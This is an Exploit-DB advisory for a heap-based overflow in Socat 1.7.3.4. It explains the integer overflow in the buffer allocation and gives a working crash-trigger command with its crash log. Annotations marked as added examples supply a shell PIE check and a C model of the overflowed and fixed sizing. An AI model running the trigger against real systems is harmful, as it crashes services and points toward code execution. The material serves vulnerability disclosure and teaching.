Socat 1.7.3.4 – Heap-Based Overflow (PoC)

  • Author: hieubl
    Date: 2020-02-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47999/
  • # Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
    # Date: 2020-02-03
    # Exploit Author: hieubl from HPT Cyber Security
    # Vendor Homepage: http://www.dest-unreach.org/
    # Software Link: http://www.dest-unreach.org/socat/
    # Version: 1.7.3.4
    # Tested on: Ubuntu 16.04.6 LTS
    # CVE :
    
    # Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)
    
    ------- [***Description***] -------
    The _socat() function in socat.c contains the integer overflow: the
    allocation size is computed as 2*bufsiz+1 with no check that the
    multiplication fits in a size_t.
    int _socat(void) {
        ...
        unsigned char *buff;
        ...
        buff = Malloc(2*socat_opts.bufsiz+1);
        ...
    }
    
    After that, the line of code "if ((bytes2 = xiotransfer(sock2, sock1,
    &buff, socat_opts.bufsiz, true)) < 0) {" calls the xiotransfer()
    function. xiotransfer() calls xioread(), and xioread() finally calls
    Read():
    
    ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
        ...
        Read(pipe->fd, buff, bufsiz); //[***!!!This line of code leads to the Heap-Based Overflow vulnerability***!!!]
        ...
    }
    
    In addition, the "Makefile" does not turn on the Position Independent
    Executables (PIE) mitigation (CFLAGS does not contain the "-pie" flag).
    By default, Ubuntu 16.04 does not turn on this mitigation either.
    Consequently, the program is easier to exploit, and the bug may even
    lead to Remote Code Execution (RCE).
    Reference: https://hackerone.com/reports/415272, $100 bounty for "Linux
    Desktop application slack executable does not use pie / no ASLR"
    
    ------- [***Download and build***] -------
    Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz
    $ tar xzvf socat-1.7.3.4.tar.gz
    $ cd socat-1.7.3.4/
    $ ./configure
    Modify the "Makefile" so that CFLAGS reads "CFLAGS = -g -O -D_GNU_SOURCE
    -Wall -Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)" (the "-g" flag is
    added for debugging purposes)
    $ make
    $ sudo make install
    
    ------- [***Proof of Concept***] -------
    $ checksec socat
    [*] '/home/natsu/temp/socat-1.7.3.4/socat'
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
        FORTIFY:  Enabled
    >>> There is no PIE mitigation!
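    The checksec "PIE" line above summarises one field of the ELF header: a
    PIE executable is linked as ET_DYN (e_type 3) and gets a randomised base,
    while a fixed-address binary like this socat at 0x400000 is ET_EXEC
    (e_type 2). The following POSIX sh function is an added example, not part
    of the advisory, that reads that field directly so the check can be run on
    a host without checksec; the function name elf_type is an assumption made
    for this example.

```shell
# Added example (not from the advisory): classify an ELF file by its e_type
# header field, which is what a PIE check ultimately looks at.
#   ET_EXEC (2): fixed load address, no PIE
#   ET_DYN  (3): position independent (PIE executable or shared object)
elf_type() {
    f="$1"
    # bytes 0-3 must be the ELF magic: 7f 45 4c 46
    magic=$(od -A n -t x1 -N 4 "$f" | tr -d ' \n')
    if [ "$magic" != "7f454c46" ]; then
        echo "not-elf"
        return 1
    fi
    # byte 5 (EI_DATA) gives the byte order of the remaining header fields
    data=$(od -A n -t u1 -j 5 -N 1 "$f" | tr -d ' \n')
    # e_type is the 16-bit field at offset 16
    set -- $(od -A n -t u1 -j 16 -N 2 "$f")
    if [ "$data" = "1" ]; then
        etype=$(( $1 + $2 * 256 ))     # little-endian (x86-64)
    else
        etype=$(( $1 * 256 + $2 ))     # big-endian
    fi
    case "$etype" in
        2) echo "EXEC (no PIE: fixed load address)" ;;
        3) echo "DYN (PIE executable or shared object)" ;;
        *) echo "other($etype)" ;;
    esac
}

# Usage: elf_type /usr/local/bin/socat
```

    ET_DYN alone does not distinguish a PIE executable from a shared library;
    when that matters, confirm with `readelf -l` (a PIE has a PT_INTERP
    segment) or `readelf -d` (DT_FLAGS_1 contains PIE). Rebuilding with
    `-fPIE -pie` in CFLAGS/LDFLAGS turns the socat binary into ET_DYN.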
    
    $ python -c 'print "A"*1000000' > a
    $ touch b
    $ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000
    
    This proof of concept triggers the bug by setting the buffer size to
    0x8000000000000050 (9223372036854775888 in decimal). Therefore, the size
    passed to "Malloc(2*socat_opts.bufsiz+1)" is 0x100000000000000a0, which
    after truncation to 64 bits is equivalent to Malloc(0xa0). The readbytes
    option ("readbytes=1000000") controls the size of the read (we cannot
    read with a size as large as 0x8000000000000050) through these lines of
    code:

    if (pipe->readbytes) {
        if (pipe->actbytes == 0) {
            return 0;
        }
        if (pipe->actbytes < bufsiz) {
            bufsiz = pipe->actbytes;
        }
    }

    ------- [***Crash logs***] -------
    *** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 ***
    ======= Backtrace: =========
    /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
    /lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
    /lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
    socat[0x407e3f]
    socat[0x4084c6]
    socat[0x408f7a]
    /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
    socat[0x4057a9]
    ======= Memory map: ========
    00400000-0044a000 r-xp 00000000 08:01 655643 /usr/local/bin/socat
    00649000-0064a000 r--p 00049000 08:01 655643 /usr/local/bin/socat
    0064a000-0064b000 rw-p 0004a000 08:01 655643 /usr/local/bin/socat
    0064b000-0068c000 rw-p 00000000 00:00 0
    01069000-0108a000 rw-p 00000000 00:00 0 [heap]
    7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
    7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
    7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
    7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
    7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
    7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
    7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
    7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
    7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
    7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
    7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
    7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
    7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
    7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
    7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
    7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
    7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
    7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
    7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
    7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
    7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
    7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
    7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
    7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
    7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
    7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
    7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
    7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
    7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
    7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
    7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
    7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
    7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
    7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
    7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
    7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
    7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
    7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
    7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
    7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
    7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
    7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
    7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0 [stack]
    7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0 [vvar]
    7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
    2020/02/04 05:33:00 socat[47233] E exiting on signal 6
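    The Description section (Malloc(2*socat_opts.bufsiz+1) feeding an
    unbounded Read()) and the Proof of Concept section (the readbytes clamp)
    describe one size-arithmetic failure. The C program below is an added
    example, not socat's source, that models both steps in a memory-safe way
    and places the overflow-checked allocation and allocation-bounded read a
    fix would use beside them. It reproduces the PoC's arithmetic: with
    bufsiz = 0x8000000000000050, 2*bufsiz alone wraps to the 0xa0 quoted
    above and the trailing +1 makes the whole expression 0xa1, so the
    allocation is tiny while readbytes still permits a 1000000-byte read. All
    function and type names (unchecked_buffer_size, checked_buffer_size,
    xbuf_t, bounded_read, simulate_transfer) are assumptions made for this
    example.

```c
/* Added example (not socat's source): models the size arithmetic behind
 * Malloc(2*socat_opts.bufsiz+1) and the readbytes clamp in xioread() as
 * the advisory describes them, beside the overflow-checked and
 * allocation-bounded versions a fix would use. All names are assumptions
 * made for this example. Assumes a 64-bit size_t. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

/* As in socat: size_t arithmetic silently wraps modulo 2^64, so a huge
 * bufsiz yields a tiny allocation. */
size_t unchecked_buffer_size(size_t bufsiz) {
    return 2 * bufsiz + 1;
}

/* Fixed variant: refuse any bufsiz for which 2*bufsiz+1 would wrap.
 * Returns 0 and sets errno = EOVERFLOW on rejection. */
size_t checked_buffer_size(size_t bufsiz) {
    if (bufsiz > (SIZE_MAX - 1) / 2) {
        errno = EOVERFLOW;
        return 0;
    }
    return 2 * bufsiz + 1;
}

/* The destination buffer together with the size that was really allocated. */
typedef struct {
    unsigned char *buff;
    size_t allocated;
} xbuf_t;

/* Models the read step. The readbytes clamp is the one quoted from
 * xioread(); the comparison against `allocated` is the added bound that
 * the vulnerable code lacks. Returns bytes copied, or -1 if refused. */
ssize_t bounded_read(xbuf_t *dst, const unsigned char *src, size_t srclen,
                     size_t bufsiz, size_t readbytes) {
    size_t want = bufsiz;
    if (readbytes != 0 && readbytes < want) {
        want = readbytes;              /* readbytes= clamp from the advisory */
    }
    if (want > dst->allocated) {
        return -1;                     /* would write past the allocation */
    }
    if (want > srclen) {
        want = srclen;                 /* short read: source exhausted */
    }
    memcpy(dst->buff, src, want);
    return (ssize_t)want;
}

/* Runs one transfer with socat's (unchecked) allocation size and a
 * constructed source of `available` bytes of 'A', standing in for file a.
 * Returns bytes copied, or -1 when the bounded read refuses to overflow
 * the allocation. */
ssize_t simulate_transfer(size_t bufsiz, size_t readbytes, size_t available) {
    size_t alloc = unchecked_buffer_size(bufsiz);
    xbuf_t dst = { malloc(alloc), alloc };
    unsigned char *src = malloc(available);
    if (dst.buff == NULL || src == NULL) {
        free(dst.buff);
        free(src);
        return -1;
    }
    memset(src, 'A', available);
    ssize_t n = bounded_read(&dst, src, available, bufsiz, readbytes);
    free(src);
    free(dst.buff);
    return n;
}

int main(void) {
    size_t poc = (size_t)0x8000000000000050ULL;   /* the -b value from the PoC */
    printf("unchecked size for PoC bufsiz: 0x%zx\n", unchecked_buffer_size(poc));
    printf("checked size for PoC bufsiz:   %zu (errno=%d)\n",
           checked_buffer_size(poc), errno);
    printf("transfer with PoC parameters:  %zd\n",
           simulate_transfer(poc, 1000000, 1000000));
    printf("transfer with a sane bufsiz:   %zd\n",
           simulate_transfer(8192, 1000000, 1000000));
    return 0;
}
```

    With the PoC parameters the bounded read returns -1 instead of copying
    1000000 bytes into a 0xa1-byte chunk, which is the condition that
    corrupts the next chunk's size field and produces the free() "invalid
    next size" abort in the crash log. Either fix alone closes the bug:
    rejecting the oversized -b value at allocation time, or never reading
    more than was allocated.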